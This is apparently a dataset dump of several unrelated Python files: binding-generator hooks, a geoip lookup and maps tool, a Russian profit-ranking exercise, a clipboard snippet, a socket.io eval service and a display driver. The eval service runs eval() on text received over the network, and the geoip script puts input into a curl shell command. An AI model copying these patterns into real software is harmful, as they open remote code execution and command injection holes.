HookError(Exception):\n pass\n\n\ndef _strip_prefixes(global_data, name):\n sp = global_data.strip_prefixes\n if sp:\n for pfx in sp:\n if name.startswith(pfx):\n name = name[len(pfx) :]\n break\n\n return name\n\n\ndef _resolve_default(fn, name):\n if isinstance(name, (int, float)):\n return str(name)\n if name in (\"NULL\", \"nullptr\"):\n return name\n\n # if there's a parent, look there\n parent = fn[\"parent\"]\n if parent:\n for prop in parent[\"properties\"][\"public\"]:\n if prop[\"name\"] == name:\n name = f\"{parent['namespace']}::{parent['name']}::{name}\"\n return name\n\n\ndef _enum_hook(en, global_data, enum_data):\n ename = en.get(\"name\")\n value_prefix = None\n if ename:\n data = enum_data.get(ename)\n if data and data.value_prefix:\n value_prefix = data.value_prefix\n else:\n value_prefix = ename\n\n en[\"x_name\"] = _strip_prefixes(global_data, ename)\n\n for v in en[\"values\"]:\n name = v[\"name\"]\n if value_prefix and name.startswith(value_prefix):\n name = name[len(value_prefix) :]\n if name[0] == \"_\":\n name = name[1:]\n v[\"x_name\"] = name\n\n\ndef header_hook(header, data):\n \"\"\"Called for each header\"\"\"\n global_data = data.get(\"data\", {})\n for en in header.enums:\n en[\"x_namespace\"] = en[\"namespace\"]\n _enum_hook(en, global_data, global_data.enums)\n\n\ndef _function_hook(fn, global_data, fn_data, typ):\n \"\"\"shared with methods/functions\"\"\"\n\n # Ignore operators, move constructors, copy constructors\n if (\n fn.get(\"operator\")\n or fn.get(\"destructor\")\n or (\n fn.get(\"constructor\")\n and fn[\"parameters\"]\n and fn[\"parameters\"][0][\"class\"]\n and fn[\"parameters\"][0][\"class\"][\"name\"] == fn[\"name\"]\n )\n ):\n fn[\"data\"] = typ({\"ignore\": True})\n return\n\n # Python exposed function name 
converted to camelcase\n x_name = _strip_prefixes(global_data, fn[\"name\"])\n x_name = x_name[0].lower() + x_name[1:]\n\n x_in_params = []\n x_out_params = []\n x_rets = []\n x_temps = []\n\n x_genlambda = False\n x_lambda_pre = []\n x_lambda_post = []\n\n data = fn_data.get(fn[\"name\"], _missing)\n if data is _missing:\n # ensure every function is in our yaml so someone can review it\n if \"parent\" in fn:\n print(\"WARNING:\", fn[\"parent\"][\"name\"], \"method\", fn[\"name\"], \"missing\")\n else:\n print(\"WARNING: function\", fn[\"name\"], \"missing\")\n data = typ()\n # assert False, fn['name']\n elif data is None:\n data = typ()\n\n if getattr(data, \"overloads\", {}):\n _sig = \", \".join(\n p.get(\"enum\", p[\"raw_type\"]) + \"&\" * p[\"reference\"] + \"*\" * p[\"pointer\"]\n for p in fn[\"parameters\"]\n )\n if _sig in data.overloads:\n overload = data.overloads[_sig]\n if overload:\n data = data.to_native()\n data.update(overload.to_native())\n data = typ(data)\n else:\n print(\n \"WARNING: Missing overload %s::%s(%s)\"\n % (fn[\"parent\"][\"name\"], fn[\"name\"], _sig)\n )\n\n # Use this if one of the parameter types don't quite match\n param_override = data.param_override\n\n # fix cppheaderparser quirk\n if len(fn[\"parameters\"]) == 1:\n p = fn[\"parameters\"][0]\n if p[\"type\"] == \"void\" and not p[\"pointer\"]:\n fn[\"parameters\"] = []\n\n # buffers: accepts a python object that supports the buffer protocol\n # as input. If the buffer is an 'out' buffer, then it\n # will request a writeable buffer. Data is written by the\n # wrapped function to that buffer directly, and the length\n # written (if the length is a pointer) will be returned\n buffer_params = {}\n buflen_params = {}\n if data.buffers:\n for bufinfo in data.buffers:\n if bufinfo.src == bufinfo.len:\n raise ValueError(\n f\"buffer src({bufinfo.src}) and len({bufinfo.len}) cannot be the same\"\n )\n buffer_params[bufinfo.src] = bufinfo\n buflen_params[bufinfo.len] = bufinfo\n\n for i, p in enumerate(fn[\"parameters\"]):\n\n if p[\"raw_type\"] in _int32_types:\n p[\"fundamental\"] = True\n p[\"unresolved\"] = False\n\n if p[\"name\"] == \"\":\n p[\"name\"] = \"param%s\" % i\n p[\"x_type\"] = p.get(\"enum\", p[\"raw_type\"])\n p[\"x_callname\"] = p[\"name\"]\n p[\"x_retname\"] = p[\"name\"]\n\n if \"forward_declared\" in p:\n fn[\"forward_declare\"] = True\n if \"parent\" in fn:\n fn[\"parent\"][\"has_fwd_declare\"] = True\n\n po = param_override.get(p[\"name\"])\n if po:\n p.update(po.to_native())\n\n p[\"x_pyarg\"] = 'py::arg(\"%(name)s\")' % p\n\n if \"default\" in p:\n p[\"default\"] = _resolve_default(fn, p[\"default\"])\n p[\"x_pyarg\"] += \"=\" + p[\"default\"]\n\n ptype = \"in\"\n\n bufinfo = buffer_params.pop(p[\"name\"], None)\n buflen = buflen_params.pop(p[\"name\"], None)\n\n if bufinfo:\n x_genlambda = True\n bname = f\"__{bufinfo.src}\"\n p[\"constant\"] = 1\n p[\"reference\"] = 1\n p[\"pointer\"] = 0\n\n p[\"x_callname\"] = f\"({p['x_type']}*){bname}.ptr\"\n p[\"x_type\"] = \"py::buffer\"\n\n # this doesn't seem to be true for bytearrays, which is silly\n # x_lambda_pre.append(\n # f'if (PyBuffer_IsContiguous((Py_buffer*){p[\"name\"]}.ptr(), \\'C\\') == 0) throw py::value_error(\"{p[\"name\"]}: buffer must be contiguous\")'\n # )\n\n # TODO: check for dimensions, strides, other dangerous things\n\n if bufinfo.type == \"in\":\n ptype = \"in\"\n x_lambda_pre += [f\"auto {bname} = {p['name']}.request(false)\"]\n elif bufinfo.type in (\"inout\", \"out\"):\n ptype = \"in\"\n x_lambda_pre += [f\"auto 
{bname} = {p['name']}.request(true)\"]\n else:\n raise ValueError(\"Invalid bufinfo type %s\" % (bufinfo.type))\n\n x_lambda_pre += [f\"{bufinfo.len} = {bname}.size * {bname}.itemsize\"]\n\n if bufinfo.minsz:\n x_lambda_pre.append(\n f'if ({bufinfo.len} < {bufinfo.minsz}) throw py::value_error(\"{p[\"name\"]}: minimum buffer size is {bufinfo.minsz}\")'\n )\n\n elif buflen:\n if p[\"pointer\"]:\n p[\"x_callname\"] = f\"&{buflen.len}\"\n ptype = \"out\"\n else:\n # if it's not a pointer, then the called function\n # can't communicate through it, so ignore the parameter\n p[\"x_callname\"] = buflen.len\n x_temps.append(p)\n ptype = \"ignored\"\n\n elif p[\"pointer\"] and not p[\"constant\"] and p[\"fundamental\"]:\n p[\"x_callname\"] = \"&%(x_callname)s\" % p\n ptype = \"out\"\n elif p[\"array\"]:\n asz = p.get(\"array_size\", 0)\n if asz:\n p[\"x_type\"] = \"std::array<%s, %s>\" % (p[\"x_type\"], asz)\n p[\"x_callname\"] = \"%(x_callname)s.data()\" % p\n else:\n # it's a vector\n pass\n ptype = \"out\"\n\n if ptype == \"out\":\n x_out_params.append(p)\n x_temps.append(p)\n elif ptype == \"in\":\n x_in_params.append(p)\n\n if p[\"constant\"]:\n p[\"x_type\"] = \"const \" + p[\"x_type\"]\n\n p[\"x_type_full\"] = p[\"x_type\"]\n p[\"x_type_full\"] += \"&\" * p[\"reference\"]\n p[\"x_type_full\"] += \"*\" * p[\"pointer\"]\n\n p[\"x_decl\"] = \"%s %s\" % (p[\"x_type_full\"], p[\"name\"])\n\n if buffer_params:\n raise ValueError(\n \"incorrect buffer param names '%s'\" % (\"', '\".join(buffer_params.keys()))\n )\n\n x_callstart = \"\"\n x_callend = \"\"\n x_wrap_return = \"\"\n\n if x_out_params:\n x_genlambda = True\n\n # Return all out parameters\n x_rets.extend(x_out_params)\n\n if fn[\"rtnType\"] != \"void\":\n x_callstart = \"auto __ret =\"\n x_rets.insert(0, dict(x_retname=\"__ret\", x_type=fn[\"rtnType\"]))\n\n if len(x_rets) == 1 and x_rets[0][\"x_type\"] != \"void\":\n x_wrap_return = \"return %s;\" % x_rets[0][\"x_retname\"]\n elif len(x_rets) > 1:\n x_wrap_return = \"return std::make_tuple(%s);\" % \",\".join(\n [p[\"x_retname\"] for p in x_rets]\n )\n\n # Temporary values to store out parameters in\n if x_temps:\n for out in reversed(x_temps):\n x_lambda_pre.insert(0, \"%(x_type)s %(name)s = 0\" % out)\n\n # Rename internal functions\n if data.internal:\n x_name = \"_\" + x_name\n elif data.rename:\n x_name = data.rename\n elif fn[\"constructor\"]:\n x_name = \"__init__\"\n\n doc = \"\"\n doc_quoted = \"\"\n\n if data.doc is not None:\n doc = data.doc\n elif \"doxygen\" in fn:\n # work around a CppHeaderParser bug\n doc = fn[\"doxygen\"].rpartition(\"*//*\")[2]\n doc = sphinxify.process_raw(doc)\n\n if doc:\n # TODO\n doc = doc.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n doc_quoted = doc.splitlines(keepends=True)\n doc_quoted = ['\"%s\"' % (dq.replace(\"\\n\", \"\\\\n\"),) for dq in doc_quoted]\n\n # if \"hook\" in data:\n # eval(data[\"hook\"])(fn, data)\n\n # bind new attributes to the function definition\n # -> previously used locals(), but this is more explicit\n # and easier to not mess up\n fn.update(\n dict(\n data=data,\n # transforms\n x_name=x_name,\n x_in_params=x_in_params,\n x_out_params=x_out_params,\n x_rets=x_rets,\n # lambda generation\n x_genlambda=x_genlambda,\n x_callstart=x_callstart,\n x_lambda_pre=x_lambda_pre,\n x_lambda_post=x_lambda_post,\n x_callend=x_callend,\n x_wrap_return=x_wrap_return,\n # docstrings\n x_doc=doc,\n x_doc_quoted=doc_quoted,\n )\n )\n\n\ndef function_hook(fn, data):\n global_data = data.get(\"data\", {})\n functions_data = 
global_data.functions\n _function_hook(fn, global_data, functions_data, FunctionData)\n\n\ndef class_hook(cls, data):\n\n # work around CppHeaderParser hoisting structs nested in classes to top\n if cls[\"parent\"] is not None:\n cls[\"data\"] = {\"ignore\": True}\n return\n\n global_data = data.get(\"data\", {})\n class_data = global_data.classes.get(cls[\"name\"])\n if class_data is None:\n print(\"WARNING: class\", cls[\"name\"], \"missing\")\n class_data = ClassData()\n\n # fix enum paths\n for e in cls[\"enums\"][\"public\"]:\n e[\"x_namespace\"] = e[\"namespace\"] + \"::\" + cls[\"name\"] + \"::\"\n _enum_hook(e, global_data, global_data.enums)\n\n # update inheritance\n for base in cls[\"inherits\"]:\n if \"::\" not in base[\"class\"]:\n base[\"ns_class\"] = f'{cls[\"namespace\"]}::{base[\"class\"]}'\n else:\n base[\"ns_class\"] = base[\"class\"]\n\n cls[\"data\"] = class_data\n methods_data = class_data.methods\n for fn in cls[\"methods\"][\"public\"]:\n try:\n _function_hook(fn, global_data, methods_data, MethodData)\n except Exception as e:\n raise HookError(f\"{cls['name']}::{fn['name']}\") from e\n","sub_path":"robotpy_build/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":12060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"271868872","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport numpy as np\nfrom random import choice,seed\nfrom base64 import b64encode as encode\nfrom base64 import b64decode as decode\nimport os\nhere = os.path.dirname(os.path.realpath(__file__))\nHOME = os.getenv('HOME')\n\nimport logging\nLG = logging.getLogger(__name__)\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n\nclass profile(object):\n def __init__(self,IP='',hostname='',country='',state='',city='',\n GPS_pos='',dates=[]):\n self.ip = IP\n self.hostname = hostname\n self.country = country\n self.state = state\n self.city = city\n self.coor = GPS_pos\n self.dates = dates\n def __str__(self):\n msg = ' IP: %s\\n'%(self.ip)\n msg += ' hostname: %s\\n'%(self.hostname)\n msg += ' country: %s\\n'%(self.country)\n msg += ' state: %s\\n'%(self.state)\n msg += ' city: %s\\n'%(self.city)\n msg += ' GPS: %s,%s\\n'%(self.coor[0],self.coor[1])\n D = self.dates\n try: msg += ' dates: %s - %s (%s)'%(D[0],D[-1],len(D))\n except IndexError: msg = msg[0:-1]\n return msg\n\nclass myTimeOut(Exception):\n \"\"\" Auxiliary class to handle TimeOut from different libraries \"\"\"\n pass\n\n\ndef analyze_IP(IP,lim=None):\n \"\"\" Randomly chooses a web service to look up the IP information \"\"\"\n funcs = [ip_api,ipapi,ipinfo,tools_keycdn] # Error in tools_keycdn\n if lim == None: lim = len(funcs)\n out,cont = False,0\n while not out or cont < lim:\n seed()\n f = choice(funcs)\n LG.info('Using api: %s for ip: %s'%(f.__name__,IP))\n try:\n resp = f(IP)\n return resp\n except myTimeOut: LG.warning('TimeOutError, try again (%s)'%(cont))\n cont += 1\n return None\n\ndef ipapi(IP,t0=3):\n \"\"\" Use webservice from ipapi.co to get information about an IP \"\"\"\n url = 'https://ipapi.co/%s/json/'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS 
position\n try:\n lat,lon = location['latitude'],location['longitude']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\n\ndef ip_api(IP,t0=3):\n \"\"\" Use webservice from ip-api.com to get information about an IP \"\"\"\n url = 'http://ip-api.com/json/%s'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n ## hostname\n try: hostname = location['hostname']\n except: hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS position\n try:\n lat,lon = location['lat'],location['lon']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\ndef ipinfo(IP,t0=3):\n \"\"\" Use webservice from ipinfo.io to get information about an IP \"\"\"\n url = 'http://ipinfo.io/%s'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n ## hostname\n try: hostname = location['hostname']\n except: hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS position\n try:\n aux = location['loc'].split(',')\n GPS_pos = (float(aux[0]),float(aux[1]))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\nimport json\ndef tools_keycdn(IP,t0=3):\n \"\"\" Use webservice from tools.keycdn.com to get information about an IP \"\"\"\n url = 'https://tools.keycdn.com/geo.json?host=%s'%(IP)\n LG.debug(url)\n #try: resp = requests.get(url, timeout=t0).json()\n #except requests.exceptions.Timeout: raise myTimeOut\n resp = os.popen('curl \"%s\"'%(url)).read().lstrip().rstrip()\n resp = json.loads(resp)\n ## hostname\n try: host = resp['data']['geo']['host']\n except: host = ''\n ## country\n try: country = resp['data']['geo']['country_code']\n except: country = ''\n ## city\n try: state = resp['data']['geo']['region']\n except: state = ''\n ## State\n try: city = resp['data']['geo']['city']\n except: city = ''\n ## GPS position\n try:\n lat = resp['data']['geo']['latitude']\n lon = resp['data']['geo']['longitude']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,host,country,state,city,GPS_pos)\n\n\ndef get_url(markers=[],C_lat=None,C_lon=None,zoom=None,maptype='roadmap',\n S=(600,300),force_path=False):\n \"\"\"\n C_lat,C_lon : Center of the map. 
if not provided, use the center of\n all markers\n markers: List of markers with format: Marker = (lat,lon,HUE_color)\n zoom: Zoom level (should be a function of the distance between markers)\n S: size of the image\n maptype: Map type, options are: roadmap,terrain,hybrid,satellite\n \"\"\"\n X = [M[0] for M in markers]\n Y = [M[1] for M in markers]\n if zoom != False:\n if len(markers) == 1 or np.mean([np.std(X),np.std(Y)]) < 0.75:\n # If only 1 point, or many points very close one to each other\n # then show a wide area to get an idea of the position (~ city level)\n zoom = 11\n sx,sy = S\n user,key = open('%s/api.private'%(here),'r').read().splitlines()\n key = str(decode(key),'utf-8')\n basic_url = 'https://maps.googleapis.com/maps/api/staticmap?'\n if C_lat!=None and C_lon!=None: basic_url += 'center=%s,%s'%(C_lat,C_lon)\n if zoom != None: basic_url += '&zoom=%s'%(zoom) #XXX make zoom automatic\n if zoom == False: pass\n basic_url += '&size=%sx%s'%(sx,sy)\n basic_url += '&maptype=%s'%(maptype)\n path = '&path=color:0x0000ff|'\n for M in markers:\n path += '%s,%s|'%(M[0],M[1]) # path\n #path += '%s,%s|'%(round(M[0],3),round(M[1],3)) # path\n #mark = '&markers=size:small|color:%s'%(M[2])+'%' #\n try: mark = '&markers=size:small|color:%s'%(M[2])+'%' #\n except IndexError: mark = '&markers=size:small|color:red%%' #\n mark += '7C%s,%s'%(M[0],M[1]) # Markers\n basic_url += mark #\n path = path[0:-1] # remove last pipe\n aux = basic_url + '&key=%s'%(key) + path\n ## add path if possible\n if len(aux) <= 2000 and not force_path: basic_url += path\n basic_url += '&key=%s'%(key)\n if len(basic_url) > 2000: print('WARNING: URL probably too long')\n return basic_url\n\n\ndef get_map(url,fname='map.png'):\n \"\"\" Download map from url \"\"\"\n import urllib\n opener = urllib.request.build_opener() #XXX This will not work\n page = opener.open(url)\n my_picture = page.read()\n fout = open(fname, \"wb\")\n fout.write(my_picture)\n fout.close()\n\n\ndef maps_bike(start,end):\n las,los = start\n lae,loe = end\n user,key = open('%s/api.private'%(here),'r').read().splitlines()\n url = 'https://maps.googleapis.com/maps/api/directions/json?'\n url += 'origin=%s,%s&'%(las,los)\n url += 'destination=%s,%s&'%(lae,loe)\n url += 'mode=bicycling&key=%s'%(key)\n return url\n\ndef get_time(start,end):\n aux = urllib.request.urlopen(maps_bike(start,end)).read().decode('utf-8')\n data = json.loads(aux)\n ds = []\n for R in data['routes']:\n for l in R['legs']:\n ds.append( float(l['duration']['text'].split()[0]) )\n return min(ds)\n\n\n\nif __name__ == \"__main__\":\n import logging\n #import log_help\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s:%(levelname)s - %(message)s',\n datefmt='%Y/%m/%d-%H:%M:%S',\n filename='geoip.log', filemode='w')\n LG = logging.getLogger('main')\n #log_help.screen_handler(LG)\n\n import argparse\n ## Get the options\n parser = argparse.ArgumentParser(description='Get Information about IP addresses')\n help_msg = 'Obtain a google maps url'\n parser.add_argument('-url',action='store_true', default=True, help=help_msg)\n help_msg = 'Download the map'\n parser.add_argument('-m',action='store_true',default=False, help=help_msg)\n parser.add_argument('IPs', nargs='*')\n args = parser.parse_args()\n\n ## Do the analysis\n coors = []\n for ip in args.IPs:\n IP = analyze_IP(ip)\n print(str(IP)+'\\n') \n coors.append(IP.coor)\n if args.url: print(get_url(markers=coors))\n if args.m: 
get_map(get_url(markers=coors))\n","sub_path":"geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"415947123","text":"\"\"\"\nЗадание 3.\n\nДля этой задачи:\n1) придумайте 1-3 решения (желательно хотя бы два)\n2) оцените сложность каждого решения в нотации О-большое\n3) сделайте вывод, какое решение эффективнее и почему\n\nПримечание:\nБез выполнения пунктов 2 и 3 задание считается нерешенным. Пункты 2 и 3 можно выполнить\nчерез строки документации в самом коде.\nЕсли у вас возникают сложности, постарайтесь подумать как можно решить задачу,\nа не писать \"мы это не проходили)\".\nАлгоритмизатор должен развивать мышление, а это прежде всего практика.\nА без столкновения со сложностями его не развить.\n\n\nСама задача:\nИмеется хранилище с информацией о компаниях: название и годовая прибыль.\nДля реализации хранилища можно применить любой подход,\nкоторый вы придумаете, например, реализовать словарь.\nРеализуйте поиск трех компаний с наибольшей годовой прибылью.\nВыведите результат.\n\"\"\"\n\nimport random\nimport operator\n\ncompanies = {\"Company1\": round(random.uniform(10000, 500000), 2),\n \"Company2\": round(random.uniform(10000, 500000), 2),\n \"Company3\": round(random.uniform(10000, 500000), 2),\n \"Company4\": round(random.uniform(10000, 500000), 2),\n \"Company5\": round(random.uniform(10000, 500000), 2),\n \"Company6\": round(random.uniform(10000, 500000), 2),\n \"Company7\": round(random.uniform(10000, 500000), 2)\n }\n\n\n# Этот вариант самый эффективный\n# только одна дорогостоящая операция поиска max в словаре.\n# предполагаю, что сложность внутри функции max O(n). Не нашел в таблице\n# Итовая сложность O (3N)\ndef profit1(company_profit_dict):\n pass\n my_profit_dict = dict(company_profit_dict) # O(1)\n result_profit_list = [] # O(1)\n print(company_profit_dict)\n for _ in range(3): # O (3)\n maxprofit_company = max(my_profit_dict.items(), key=operator.itemgetter(1))[0] # O(N)\n result_profit_list.append(maxprofit_company) # O(1)\n my_profit_dict.pop(maxprofit_company) # O(1)\n return result_profit_list\n\n\n# Итоговая сложность O(3N + N^2)\ndef profit_2(company_profit_dict):\n profit_storage = []\n for _ in range(3):\n max_profit = 0\n for val in company_profit_dict.values():\n if val > max_profit and val not in profit_storage:\n max_profit = val\n profit_storage.append(max_profit)\n\n for key in company_profit_dict.keys():\n for i in profit_storage:\n if company_profit_dict[key] == i:\n print(f'{key}, {company_profit_dict[key]}')\n\n\nres1 = profit1(companies)\nprint(res1)\n","sub_path":"Урок 1. 
Практическое задание/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"96056018","text":"#!/usr/bin/env python\n\n# For details, in Mac OS X Terminal type: man pbcopy\n\nimport subprocess, sys\n\ndef getClipboardData(): # Only works for data types: {txt | rtf | ps}\n p = subprocess.Popen(['pbpaste'], stdout=subprocess.PIPE)\n retcode = p.wait()\n data = p.stdout.read()\n return data\n\ndef setClipboardData(data):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(data)\n p.stdin.close()\n retcode = p.wait()\n\ndef sendTextToiOS(inText):\n pass # Your Prowl code goes here!!!\n\ndef main(argv):\n theText = getClipboardData()\n if not theText:\n print('No text found on the Mac OS X Pasteboard.')\n return -1 # signal error\n print('Got: ' + theText)\n sendTextToiOS(theText)\n return 0 # noError\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))","sub_path":"all-gists/6203459/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152495289","text":"from uuid import uuid4\nimport time\nimport inspect\nimport os\n\nimport Executables\nfrom SwergioUtility.SocketIOClient import SocketIOClient\nfrom SwergioUtility.MessageUtility import MessageInterface\nfrom SwergioUtility.Settings import getBasicSettings\n\nclass PythonEvaluation():\n def __init__ (self, custom_settings_path = None):\n self._socketIONamespaces = ['PythonEvaluation']\n self._socketIOSenderID = uuid4()\n self._socketIOClient = SocketIOClient(self._socketIONamespaces)\n\n self.safe_list = inspect.getmembers(Executables,inspect.isfunction)\n self.safe_dict = dict(self.safe_list)\n\n self.exec_reward = os.getenv('EXEC_REWARD') or -1\n self.error_reward = os.getenv('ERROR_REWARD') or -10\n self.canthandle_reward = os.getenv('CANTHANDLE_REWARD') or -50\n\n custom_settings_path = custom_settings_path or os.getenv('CUSTOM_SETTINGS_PATH')\n\n max_length_message_text, self.MessageTypeEnum = getBasicSettings(custom_settings_path)\n \n def On_PythonEvaluation_Message(self,data):\n msg = MessageInterface.from_document(data)\n comID = msg.CommunicationID\n doAction = True\n if msg.SenderID != str(self._socketIOSenderID):\n if self.MessageTypeEnum[msg.MessageType] == self.MessageTypeEnum.QUESTION:\n command = msg.Data\n self.act(command,comID)\n else:\n self.canthandle(comID)\n\n def ListenToSocketIO(self):\n self._socketIOHandler = [self.On_PythonEvaluation_Message]\n self._socketIOClient.listen(self._socketIOHandler)\n\n def act(self,command,CommunicationID):\n try:\n result = eval(command, {\"__builtins__\" : None }, self.safe_dict)\n if result != str:\n result = str(result)\n reward = self.exec_reward\n except:\n result = 'error'\n reward = self.error_reward\n\n self.emitObservation(result,reward, False, CommunicationID)\n\n def canthandle(self,comID):\n ob = '?'\n reward = self.canthandle_reward\n self.emitObservation(ob,reward,False,comID)\n\n def emitObservation(self,result,reward, done,CommunicationID):\n msgTyp = self.MessageTypeEnum.ANSWER.name\n namespace = self._socketIONamespaces[0]\n if type(result) != str:\n if type(result) == int:\n result = str(result)\n else:\n result = str(list(result))\n Message = MessageInterface(namespace,self._socketIOSenderID, msgTyp,CommunicationID,Data = result, Reward = reward, DoneFlag = done)\n 
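        # The result is wrapped in a swergio Message tagged with the original
        # CommunicationID, so the component that sent the QUESTION can match
        # this ANSWER back to it; the Reward and DoneFlag fields let a
        # learning agent score the evaluated command.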
self._socketIOClient.emit(Message,namespace) \n ","sub_path":"pythonEvaluation.py","file_name":"pythonEvaluation.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512814049","text":"import time\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\nfrom PIL import ImageFont\n\nfrom luma.core.render import canvas\nimport luma\n\nfrom pins import *\n\n\nclass Dispmod():\n ''' Class for Display\n '''\n\n def __init__(self, Main):\n self.Main = Main\n self.disp_timeout = 20\n self.disp_timeout_night = 5\n self.activity_timeout = 300\n self.disp_mode = 2 # 0 = off, 1 = menu, 2 = big time, 3 = alarm\n self.disp_update = True\n self.s_font, self.m_font, self.b_font = [\n make_font(\"Roboto-Bold.ttf\", sz) for sz in [16, 24, 40]]\n self.awe_font = make_font(\"Font_Awesome_Regular.otf\", 16)\n self.awe_b_font = make_font(\"Font_Awesome_Solid.otf\", 16)\n\n self.y_topbar_size = 16\n self.menu_text = \"Hallo :)\"\n self.update()\n\n def update(self):\n '''If there is something to update it will do so.\n Updates at least every 10s.\n After the timeout display will go in fullscreen mode.\n '''\n if self.disp_update:\n self.month, self.mday, self.h, self.m, self.s, self.wday = [\n time.localtime()[i] for i in range(1, 7)]\n if self.m < 10: # min has allways 2 digits\n self.m = \"0\" + str(self.m)\n\n self.set_menu_text()\n self.last_update = time.time()\n try:\n self.show()\n except OSError as e:\n print(e)\n print(\"ERROR while show()\")\n self.disp_update = True\n except luma.core.error.DeviceNotFoundError as e:\n print(e)\n print(\"ERROR while show()\")\n self.disp_update = True\n\n elif self.last_update <= time.time() - 10: # update at least every 10s\n self.disp_update = True\n\n if self.Main.menu_mode == \"Main\":\n if self.Main.last_activity <= time.time() - self.disp_timeout:\n # after timeout change in fullscreen mode\n self.set_disp_mode(2)\n self.Main.menu_mode = \"full_screen\"\n\n elif self.Main.menu_mode == \"full_screen\":\n if self.Main.last_activity <= time.time() - self.activity_timeout:\n print(\"Activity timeout: --> night\")\n self.Main.menu_mode = \"night\"\n self.set_disp_mode(0)\n\n elif self.Main.menu_mode == \"night\":\n if self.Main.last_activity <= time.time() - self.disp_timeout_night:\n # after night timeout turn back off\n self.set_disp_mode(0)\n\n def show(self):\n with canvas(disp) as draw:\n # draw = PIL.ImageDraw.Draw().Draw\n if self.disp_mode == 0: # off\n pass\n\n # -----Standard menu text-----\n elif self.disp_mode == 1:\n\n self.build_topbar(draw)\n\n # choose appropriate fontsize, wrap text if necessary\n menu_font = self.m_font\n if draw.textsize(self.menu_text, menu_font)[0] > dispWidth:\n self.menu_text = self.menu_text.replace(\" \", \"\\n\", 1)\n if (draw.textsize(self.menu_text, menu_font)[0] > dispWidth\n or draw.textsize(self.menu_text, menu_font)[1] >\n dispWidth - self.y_topbar_size):\n menu_font = self.s_font\n y_m_text = (\n dispHight + self.y_topbar_size\n - draw.textsize(self.menu_text, menu_font)[1]) / 2\n x_m_text = (\n dispWidth - draw.textsize(self.menu_text, menu_font)[0]) / 2\n\n draw.text((x_m_text, y_m_text),\n self.menu_text, \"white\", menu_font, align=\"center\")\n\n # -----show only clock in big-----\n elif self.disp_mode == 2:\n\n clock_text = \"{} : {}\".format(self.h, self.m)\n x_clock = (\n dispWidth - draw.textsize(clock_text, self.b_font)[0]) / 2\n y_clock = (\n dispHight - draw.textsize(clock_text, self.b_font)[1]) / 
2\n draw.text((x_clock, y_clock), clock_text, \"white\", self.b_font)\n\n if self.Main.ringing:\n ring_text = \"Beenden mit'Zurück'\"\n x = (dispWidth -\n draw.textsize(ring_text, self.s_font)[0]) / 2\n y = dispHight - draw.textsize(ring_text, self.s_font)[1]\n draw.text((x, y), ring_text, \"white\", self.s_font)\n\n # -----multiline text, used for alarms-----\n elif self.disp_mode == 3:\n disp_list = self.Main.Alarm.get_disp_list()\n\n self.build_topbar(draw)\n\n for line_nr, alarm in enumerate(disp_list):\n alarm_txt = alarm.get_a_datetime().strftime(\"%H:%M\")\n if alarm.get_selected(): # selected?\n sel_txt = \"\\uf061\"\n else:\n sel_txt = \"\"\n\n if alarm.get_armed24(): # active?\n active_txt = \"\\uf0f3\"\n else:\n active_txt = \"\\uf1f6\"\n\n x_sel = 0\n x_alarm = 24\n x_active = dispWidth - 24\n y = self.y_topbar_size + (line_nr * 16)\n\n draw.text((x_sel, y), sel_txt, \"white\", self.awe_b_font)\n draw.text((x_alarm, y), alarm_txt, \"white\", self.s_font)\n draw.text((x_active, y), active_txt,\n \"white\", self.awe_font)\n\n # -----setup alarm-----\n elif self.disp_mode == 4:\n self.build_topbar(draw)\n mod_alarm = self.Main.Alarm.mod_alarm\n\n y_1, y_2, y_3 = [(i+1)*self.y_topbar_size for i in range(3)]\n\n if mod_alarm.mod_part == \"h\":\n date = mod_alarm.a_datetime\n above = (date + timedelta(hours=-1)).strftime(\"%H\")\n text = date.strftime(\"%H:%M\")\n below = (date + timedelta(hours=+1)).strftime(\"%H\")\n\n x_0 = (\n dispWidth - draw.textsize(text, self.s_font)[0]) / 2\n x_1 = x_0\n x_2 = (x_1 + draw.textsize(above, 